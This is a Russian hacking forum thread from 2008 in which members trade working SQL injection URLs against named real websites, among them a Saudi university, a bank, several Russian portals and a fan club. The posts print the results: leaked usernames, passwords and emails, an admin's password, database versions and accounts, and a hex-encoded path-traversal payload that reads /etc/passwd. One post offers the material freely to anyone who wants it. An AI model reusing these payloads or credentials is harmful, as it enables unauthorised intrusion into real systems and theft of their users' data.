ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5581  
Старый 31.05.2008, 21:44
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

~!DoK_tOR!~

aziz:112233:azizsoft@lantech.cc

Цитата:
http://www.alyamamah.edu.sa/showpage.php?id=-160+union+select+1,concat(name,0x3a,password,0x3a, email),3,4,5,6,7,8,9,10,11,12,13+FROM+ems_members+ where+id=1/*
перебор по ID, удобнее испольховать вместо limit)

так интереснее:
Цитата:
http://www.alyamamah.edu.sa/showpage.php?id=-160+union+select+1,concat(username,0x3a,password,0 x3a,id),3,4,5,6,7,8,9,10,11,12,13+FROM+login/*
www.alyamamah.edu.sa/admin/

Последний раз редактировалось sabe; 31.05.2008 в 22:06..
 
Ответить с цитированием

  #5582  
Старый 31.05.2008, 22:41
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

На американском сайте ЦРУ
http://www.cia.gov/
если в поиск ввести ' кажися SQL!!!
Там БД будет дорого стоить при удачном взломе!!!
 
Ответить с цитированием

  #5583  
Старый 31.05.2008, 23:32
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

Код:
http://www.egmont.ru/journals/articles.php?id=4%20union%20select%201,2,3,4,5,6,7,8,concat_ws(0x3A,table_schema,TABLE_NAME),0,1,2,3,4,5,6,7,8,19+FROM+INFORMATION_SCHEMA.TABLES%20limit%2050,1/*
ничего особенного
 
Ответить с цитированием

  #5584  
Старый 01.06.2008, 00:38
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

BlackSun - немножко поправил)
Цитата:
http://support.jgaa.com/index.php?cmd=ShowProduct&ID=-1/**/union/**/select/**/1,concat(Id,char(20),NickName,char(20),Password,ch ar(20),email),3,4,5,6,7/**/from/**/User/*
Nightmarе
это не иньекция.

Последний раз редактировалось sabe; 01.06.2008 в 01:03..
 
Ответить с цитированием

  #5585  
Старый 01.06.2008, 01:03
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

кому надо берите :\
Код:
http://spark-portal.ru/fileinfo.php?id=-111+UNION+SELECT+1,concat_ws(0x3a,username,user_password)+from+sp_users/*
админ форума:
swt:rb,thgfyr
 
Ответить с цитированием

  #5586  
Старый 01.06.2008, 01:21
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

maxster
Цитата:
http://spark-portal.ru/fileinfo.php?id=-111+UNION+SELECT+1,concat(username,0x3a,user_passw ord,0x3a,user_id)+from+bb3stable_users/*
но где админка?)

Последний раз редактировалось sabe; 01.06.2008 в 01:23..
 
Ответить с цитированием

  #5587  
Старый 01.06.2008, 14:47
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

Билан, гыыыыы)) (нужна регистрация)
Цитата:
http://www.bilandima.ru/friendsclub/passquestion.php?email=aaa'+or+1=1/*
http://www.bilandima.ru/friendsclub/passquestion.php?email=aaa'+union+select+1/*
http://www.bilandima.ru/friendsclub/passquestion.php?email=aaa'+or+1=1+union+select+11 111+limit+16,1/*
http://www.bilandima.ru/friendsclub/userinfo.php?id=69691&tar=1'+union+select+11,22,33 ,44/*
http://www.bilandima.ru/friendsclub/userinfo.php?id=0'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
,25,26,27,28/*
http://www.bilandima.ru/friendsclub/userinfo.php?id=0'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,concat_w
s(0x3a,version(),database(),user()),23,24,25,26,27 ,28/*
http://www.bilandima.ru/friendsclub/readers.php?id=0'+union+select+111/*
http://www.bilandima.ru/friendsclub/mydnevnikchg.php?chg=53113'+union+select+1,2,3,4,5 ,6,7/*
sabe, в твоём случае админки может и не быть. Мот там у админа какие-нить новые кнопочки появляются;-)

Последний раз редактировалось o3,14um; 01.06.2008 в 14:50..
 
Ответить с цитированием

  #5588  
Старый 01.06.2008, 20:50
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

Цитата:
http://www.calbank.net/newsite/products&services/index.php?id=99999+union+select+1,2,VERSION(),4,5, 6,7,8,9/*
VERSION: 4.1.22-standard-log
USER: 334937_alfred@172.16.11.215
DATABASE: 334937_calcms

========================================
Цитата:
http://www.euro-flash.net/release.php?ID=99999+union+select+1,2,VERSION(),4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27/*
VERSION: 5.0.45-COMMUNITY
USER: NIKITIN_NIKITIN@LOCALHOST
DATABASE: NIKITIN_EUROFLASH

========================================
Цитата:
http://www.naturallyyoumagazine.com/house.php?id=99999+union+select+1,2,VERSION(),4/*
VERSION: 4.0.27-icd1-log
USER: naturally@localhost
DATABASE: ny_db
 
Ответить с цитированием

  #5589  
Старый 01.06.2008, 20:58
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию

ProTour

Цитата:
http://protour.prositer.ru/tours/index.php?ttid=14+AND+1--
http://protour.prositer.ru/countries/?id=14+and+1--
http://protour.prositer.ru/tours/index.php?ttid=14+AND+1<ascii(substring((version() ),3,1))--
VERSION(): 4.1.11-Debian_4sarge7-log
DATABASE(): prositer_tour
USER(): prositer_tour@77.221.130.3
 
Ответить с цитированием

  #5590  
Старый 01.06.2008, 22:27
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Имена колонок подобрать несмог, мускул 4 ..

http://www.luthiersargentinos.com.ar/data.php?id=0&p=1&nota=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e 2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e 2f2e2e2f2e2e2f2e2e2f6574632f706173737764,10,11,12, 13,14/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ